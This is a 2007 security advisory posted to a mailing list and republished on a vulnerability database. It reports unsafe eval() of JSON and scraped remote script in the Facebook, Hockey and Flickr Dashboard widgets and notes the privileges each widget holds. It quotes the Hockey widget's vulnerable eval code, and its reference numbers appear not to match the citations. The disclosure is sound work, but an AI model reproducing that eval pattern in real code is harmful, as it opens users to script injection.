Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18567
HistoryDec 05, 2007 - 12:00 a.m.

Some more widgets: Facebook, Hockey, FlickrInterestingNess (Re: [MacOS X] Insecure eval() in Twitgit and Twitterlex dashboard widgets)

2007-12-0500:00:00
vulners.com
9
JSON

This is a follow-up to [0] and [1].

Last night, I wrote:

> It would probably be an interesting exercise to go through some more
> dashboard widgets and grep for eval. I'd bet quite a bit that
> there's much more out there.

  • The (top-50) facebook widget [2] uses the AllowFullAccess
    configuration option, which effectively means what it says.

    This widget also uses JSON to access numerous facebook functions,
    and eval() to parse the results. Most of facebook's API is
    accessed through plain HTTP, of course, so the discussion in [0]
    and [1] fully applies. It might be interesting to see whether one
    of the facebook JSON APIs is susceptible to cross-site-scripting
    attacks.

    The vulnerability is actually imported from the facebook API
    JavaScript library [7], and will affect any other JavaScript code
    that relies on that library.

The following two are somewhat more shy with respect to the holes
they blow into the dashboard's JavaScript sandbox, and therefore a
bit less interesting:

  • The Hockey widget [3], currently presented as an Apple Staff Pick
    on [4], performs a lot of screen – or rather, script – scraping.
    Here's a little gem:

      var xmlResponse = xmlRequest.responseText;
  xmlResponse = xmlResponse.replace(/[\n\r]/g,"");
  var NHLatl = null;
  var gameData = xmlResponse.match(/script[^<]*var NHLatl.*?<\/script>/)[0].replace(/.*?var /,"").replace(/,\s*myScoresIcon.*/,"}");
  eval(gameData);

    So, for a change, the threat is not due to JSON, but due to the
    use of eval to extract data from JavaScript embedded with some Web
    page out there.

    The privileges gaied with this one are a bit boring, as it's only
    the ability to go out on the network. But wait for the day on
    which AllowSystem is added in order to get Growl notifications of
    recent results!

  • The Flickr Interestingness widget [5] (unfortunately, these folks
    don't give a contact e-mail address) uses JSON with eval to check
    for the availability of upgrades, and to fetch data from the
    flickr API.

    This widget comes with the AllowInternetPlugins privilege, and is
    therefore another vector through which one could exercise, say,
    the latest QuickTime vulnerability. [6]

  1. http://log.does-not-exist.org/archives/2007/12/03/2155_json_eval_owning_the_dashboard.html
  2. http://www.securityfocus.com/archive/1/484542/30/0/threaded
  3. http://www.apple.com/downloads/dashboard/email_messaging/facebookwidget.html
  4. http://www.apple.com/downloads/dashboard/sports/hockeywidget.html
  5. http://www.apple.com/downloads/dashboard/
  6. http://www.apple.com/downloads/dashboard/blogs_forums/flickrinterestingness.html
  7. http://www.securityfocus.com/bid/26549
  8. http://developersdigest.org/wordpress/?page_id=4

Cheers,

Thomas Roessler, W3C <[email protected]>

JSON